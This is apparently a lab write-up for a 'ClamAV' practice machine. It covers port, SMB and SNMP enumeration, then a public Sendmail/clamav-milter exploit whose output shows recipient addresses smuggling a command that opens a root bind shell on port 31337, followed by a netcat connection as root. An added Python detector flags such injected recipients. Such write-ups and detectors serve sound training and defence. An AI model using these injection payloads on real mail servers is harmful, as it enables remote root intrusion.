# ClamAV

`enumeration` `smtp` `snmp`

* Machine name: ClamAV
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 11:34 EDT
Nmap scan report for 192.168.233.42
Host is up (0.029s latency).
Not shown: 65395 closed tcp ports (conn-refused), 133 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.176], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods: 
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-18T15:35:19-04:00
|_clock-skew: mean: 5h59m59s, deviation: 2h49m43s, median: 3h59m58s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
```

### HTTP (80)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FfZMzveRQHVlMk0Uu0bAC%2F7b5b4fd879cc3287be0b48ab38eadc7e.png?alt=media&#x26;token=8a2ab795-952d-4b28-ab4f-f7b9e89e9924" alt=""><figcaption></figcaption></figure>

ifyoudontpwnmeuran00b

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FzTTfZhbDp6Zuz8ydOuMD%2F9eda33479bd7be61d0f266d322db5477.png?alt=media&#x26;token=4a6edbd3-cd30-4878-8ed7-79278803559e" alt=""><figcaption></figcaption></figure>

### SMB (139/445)

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.233.42 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.233.42:445	Name: 192.168.233.42      	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
	ADMIN$                                            	NO ACCESS	IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
```

### Smux (199): Linux SNMP multiplexer

UDP port 161 (SNMP) is also open.

```
┌──(kali㉿kali)-[~]
└─$ snmpwalk -v 2c -c public 192.168.233.42 | grep STRING 
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB module to describe generic objects for network interface sub-layers"
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.2.2.1.2.1 = STRING: "lo"
iso.3.6.1.2.1.2.2.1.2.2 = STRING: "eth0"
iso.3.6.1.2.1.2.2.1.2.3 = STRING: "sit0"
iso.3.6.1.2.1.2.2.1.6.2 = Hex-STRING: 00 50 56 9E 5F 5A 
iso.3.6.1.2.1.2.2.1.6.3 = Hex-STRING: 00 00 00 00 5F 5A 
iso.3.6.1.2.1.3.1.1.2.2.1.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 
iso.3.6.1.2.1.4.22.1.2.2.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 08 12 0F 32 38 00 2D 04 00 
iso.3.6.1.2.1.25.1.4.0 = STRING: "root=/dev/sda1 ro 
Timeout: No Response from 192.168.233.42
iso.3.6.1.2.1.25.2.3.1.3.2 = STRING: "Real Memory"
iso.3.6.1.2.1.25.2.3.1.3.3 = STRING: "Swap Space"
iso.3.6.1.2.1.25.2.3.1.3.4 = STRING: "/"
iso.3.6.1.2.1.25.2.3.1.3.5 = STRING: "/sys"
```

We now have a domain name; we add it to /etc/hosts and look for subdomains, without result.

```
┌──(kali㉿kali)-[~/oscp/clamav]
└─$ snmp-check 192.168.233.42
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.233.42:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.233.42
  Hostname                      : 0xbabe.local
  Description                   : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
  Location                      : Unknown (configure /etc/snmp/snmpd.local.conf)
  Uptime snmp                   : 01:10:10.80
  Uptime system                 : 01:09:33.70
  System date                   : 2024-8-18 16:42:30.0

{...}
3771                  runnable              klogd                 /sbin/klogd                               
  3775                  runnable              clamd                 /usr/local/sbin/clamd                      
  3778                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
  3791                  runnable              nmbd                  /usr/sbin/nmbd        -D    
{...}
```

### SMTP (25)

We enumerate users and only find root. The ClamAV version, however, is what interests us: it is vulnerable!

{% embed url="https://www.exploit-db.com/exploits/4761" %}

## Initial access

```
┌──(kali㉿kali)-[~/oscp/clamav]
└─$ perl exploit.py 0xbabe.local  
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 0xbabe.local...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 18 Aug 2024 16:33:38 -0400; (No UCE/UBE) logging access from: [192.168.45.176](FAIL)-[192.168.45.176]
250-localhost.localdomain Hello [192.168.45.176], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 47IKXc5Q004630 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
```
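Two findings above are worth turning into checks a defender can run over the same observations: the SNMP process list exposes `clamav-milter` running with `--black-hole-mode`, and the Sendmail replies show recipient addresses whose local part carries a shell pipeline. The script below is an added example, not part of the original writeup or of the ClamAV or Sendmail projects. The sample rows and replies are constructed to mirror the output shown above; the function names and the metacharacter list are my own choices.

```python
import re

# --- Constructed sample data, modeled on the snmp-check and SMTP output in this writeup ---

# Process rows as printed by snmp-check (pid, state, name, path, arguments).
SNMP_PROCESS_ROWS = [
    "3771  runnable  klogd          /sbin/klogd",
    "3775  runnable  clamd          /usr/local/sbin/clamd",
    "3778  runnable  clamav-milter  /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl",
    "3791  runnable  nmbd           /usr/sbin/nmbd        -D",
]

# Sendmail replies from one SMTP session: two ordinary recipients, two injected ones.
SMTP_REPLIES = [
    "250 2.1.0 <>... Sender ok",
    "250 2.1.5 <alice@example.com>... Recipient ok",
    "250 2.1.5 <bob+newsletter@example.com>... Recipient ok",
    "250 2.1.5 <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\">... Recipient ok",
    "250 2.1.5 <nobody+\"|/etc/init.d/inetd restart\">... Recipient ok",
]


def parse_snmp_processes(rows):
    """Split snmp-check process rows into pid/state/name/path/args records."""
    procs = []
    for row in rows:
        parts = row.split(None, 4)  # the argument column may itself contain spaces
        if len(parts) < 4:
            continue
        pid, state, name, path = parts[:4]
        args = parts[4].strip() if len(parts) == 5 else ""
        procs.append({"pid": int(pid), "state": state, "name": name, "path": path, "args": args})
    return procs


def find_black_hole_milters(rows):
    """Return every clamav-milter process started with --black-hole-mode.

    That is the configuration the exploit in the writeup relies on: the
    shell command travels inside the recipient address.
    """
    return [
        p for p in parse_snmp_processes(rows)
        if p["name"] == "clamav-milter" and "--black-hole-mode" in p["args"].split()
    ]


# Sendmail's acknowledgement of an accepted recipient, address captured between <...>.
RECIPIENT_OK = re.compile(r"^250 2\.1\.5 <(?P<addr>.+)>\.\.\. Recipient ok$")
# Characters that do not belong in a mailbox local part and mark a command injection attempt.
SHELL_METACHARS = re.compile(r"[|;`&<>]|\$\(")


def find_injected_recipients(replies):
    """Return (address, reason) for each accepted recipient whose local part carries shell syntax."""
    hits = []
    for line in replies:
        m = RECIPIENT_OK.match(line)
        if not m:
            continue
        addr = m.group("addr")
        local_part = addr.rsplit("@", 1)[0]   # everything before the last '@'
        meta = SHELL_METACHARS.search(local_part)
        if meta:
            hits.append((addr, f"shell metacharacter {meta.group(0)!r} in local part"))
    return hits


if __name__ == "__main__":
    for p in find_black_hole_milters(SNMP_PROCESS_ROWS):
        print(f"[!] pid {p['pid']}: {p['path']} {p['args']}")
    for addr, why in find_injected_recipients(SMTP_REPLIES):
        print(f"[!] suspicious recipient <{addr}>: {why}")
```

Run against the sample data, the first check reports pid 3778 and the second reports the two `nobody+"|..."` recipients while leaving the plus-addressed `bob+newsletter` alone; the same functions can be pointed at real snmp-check output or a Sendmail session log, since both parsers only depend on the line shapes shown in the writeup.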

The exploit works! All that is left is to connect to the port we just opened...

```
┌──(kali㉿kali)-[~]
└─$ nc 192.168.233.42 31337
whoami
root
```

We are root!
